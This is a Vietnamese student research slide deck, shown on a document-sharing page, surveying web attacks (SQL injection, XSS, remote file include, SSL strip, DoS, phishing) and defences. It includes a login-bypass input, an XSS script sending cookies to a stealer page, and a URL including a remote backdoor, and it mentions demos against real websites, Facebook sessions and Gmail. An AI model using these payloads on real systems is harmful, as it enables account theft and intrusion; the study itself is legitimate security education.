1. Trang chủ
  2. » Tất cả

Tìm hiểu cách thức tấn công một website

20 590 2
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 20
Dung lượng 1,83 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Phân loại các hình thức tấn công web 3.. Giới thiệu một số phương pháp tấn công web 4.. Phân loại các hình thức tấn công Web  Tấn công web client  Tấn công firewall  Tấn công applicat

Trang 1

NGHIÊN CỨU MỘT SỐ PHƯƠNG PHÁP

TẤN CÔNG WEB

10/2010

Giảng viên:

Sinh viên :

Trang 2

Mục lục

1 Động lực tấn công Web

2 Phân loại các hình thức tấn công web

3 Giới thiệu một số phương pháp tấn công web

4 Phát hiện và phòng chống

5 Demo

6 Kết quả đạt được và phương hướng phát

triển.

7 Lời cảm ơn.

Trang 3

1 Động lực tấn công Web

 Tấn công gây rối loạn các mạng lưới điều hành.

 Tấn công nhằm đánh cắp các thông tin quan trọng, tuyên

truyền tư tưởng phản động…

 Tấn công vì sự thù ghét nhau, nhằm hạ bệ đối phương….

 Tấn công vì sự tò mò của giới mới vào nghề

 Tấn công vì mục đích muốn kiếm tiền…

Trang 4

2 Phân loại các hình thức tấn công

Web

 Tấn công web client

 Tấn công firewall

 Tấn công application Web server

 Tấn công web platform

 Tấn công Database

Mô hình chuẩn Web APP

Trang 5

2 Phân loại các hình thức tấn công

web

Trang 6

3 Giới thiệu một số phương pháp tấn

công web

 SQL Injection

 Cross site scripting

 Remote file include

 SSL strip Man-in-the-middle

 DoS

 Phising

Trang 7

3.1 SQL Injection

 Thường xảy ra trên các ứng dụng web có csdl được quản lý bằng các hệ

cơ sở dữ liệu như SQL Server, Mysql, Oracle, DB2, Sysbase,

MsAccess…

 Mỗi hệ quản trị csdl có một số điểm giống và khác nhau giữa các

phương pháp injection

 SQL bypass

 SQL injection

Trang 8

<% Dim vUsrName, vPassword, objRS, strSQL vUsrName = Request.Form("fUSRNAME")

vPassword = Request.Form("fPASSWORD")

strSQL = "SELECT * FROM T_USERS " & _"WHERE

USR_NAME=' " & vUsrName & _" ' and

USR_PASSWORD=' " & vPassword & " ' "

Set objRS = Server.CreateObject("ADODB.Recordset")

objRS.Open strSQL, "DSN= "

If (objRS.EOF) Then

Response.Write "Invalid login.“

Else

Response.Write "You are logged in as " &

objRS("USR_NAME")

End If

Set objRS = Nothing %>

Khi hacker nhập vào:

‘ or 1=1

SELECT * FROM T_USERS WHERE USR_NAME =''

OR 1=1 and USR_PASSWORD= '' OR 1=1

Trang 9

3.1 SQL Injection

Ngoài ra còn một số kĩ thuật nâng cao khác sử dụng SQL injection như:

 Union/Convert magic (khai thác dữ liệu)

 Blind SQL injection

 Tạo script Ddos sever

 Nâng quyền user sử dụng xp_cmdshell

 Upload backdoor

Trang 10

3.2 Cross site scripting

 Cross site scripting viết tắt là XSS là một dạng tấn công hướng

về phía User (Client) mà ko tác động trực tiếp đến webserver

 Hacker thường lợi dụng XSS để đánh cắp cookie của user,

phising …

 Có 2 loại XSS chính :

 Store – Cross site scripting

 Reflect – Cross site scripting

Trang 11

3.2 Cross site scripting

<script>

window.location = 'http://yoursite.com/stealer.php?cookie=' +

document.cookie;

</script>

Trang 12

3.2 Cross site scripting

Trang 13

3.3 Remote File include

 Là một lỗi thông dụng trong các ứng dụng web được viết bằng PHP

 Có liên quan mật thiết đến phương pháp local attack

 Lợi dụng sự bất cẩn của Programmer khi dùng hàm include() hay require() trong PHP

<?

include(“$ex”);

?>

http://www.[target].com/test.php?ex=http://www.[attacker].com/backdoor.php

Trang 14

3.4 SSL strip

 Hoạt động chính dựa theo cách thức tấn công Man-in-the-middle

 Lợi dụng sự bất cẩn của người dùng

Trang 15

3.4 DoS

 Hacker tạo ra những script để post một cách tự động vào forum, create member, search form, feedback

 Cạn kiệt tài nguyên server như BW, HDD, DB …

 Dựa vào bug của service đang chạy trên server

Trang 16

3.5 Phising

Mục đích chủ yếu là lừa đảo,nhắm đến tài chính

Khó bị phát hiện do xuất phát từ địa chỉ không có thật

Trang 17

4 Phòng tránh

• SQL injection :

 Lọc các truy vấn bằng mod_security, URL_filter

 Kiểm tra code lập trình

• Cross site script / Remote file include

 Kiểm tra code lập trình

 Lọc nội dung input cũng như URL

• SSL Strip

 Nâng cao nhận thức người sử dụng

 DNS security đang được phát triển

• DoS

 Sử dụng các chức năng xác thực bằng hình ảnh hoặc âm thanh

• Phising

 Sử dụng các công cụ phát hiện scam(ScamBlocker )

 không nên nhấn vào link trực tiếp trong email

Trang 18

5 Demo

• 1, Tấn công fisopro.com.vn bằng lỗi trên bất cẩn của người lập trình trên dịch vụ web + IIS 6.0

• 2, Remote file include

• 3, Cướp session của người dùng facebook

• 4, SSL strip với gmail.com

• 5, Buffer overflow IE 7

• 6, Tấn công sql injection

– By pass

– Tool

– Thủ công

Trang 19

6 Kết quả đạt được và phương hướng

phát triển của đề tài.

 Kết quả đạt được:

 Hiểu thêm về các lỗ hổng trong Web

 Demo được một số cách tấn công Web (sử dụng các website thật)

 Tìm hiểu một số cách phòng tránh lại các kiểu tấn công như (SQL injection, Phising, Dos…)

 Phương hướng phát triển của đề tài:

 Tìm hiểu thêm các tool để tấn công Web.

 Viết được các tool tấn công Web từ đó đưa ra cách phòng tránh kiểu tấn công đó.

 Áp dụng những kiểu tấn công và các phương pháp phòng tránh vào thực tế

Trang 20

7 Lời cảm ơn

 Chúng em xin cảm ơn thầy Bùi Việt Thắng đã giúp đỡ chúng

em hoàn thành bài Nghiên cứu khoa học

 Cảm ơn Học viện Kỹ Thuật Mật Mã đã tạo điều kiện cho

chúng em có cơ hội thực hiện đề tài khoa học này

Ngày đăng: 14/12/2021, 21:38

TỪ KHÓA LIÊN QUAN

w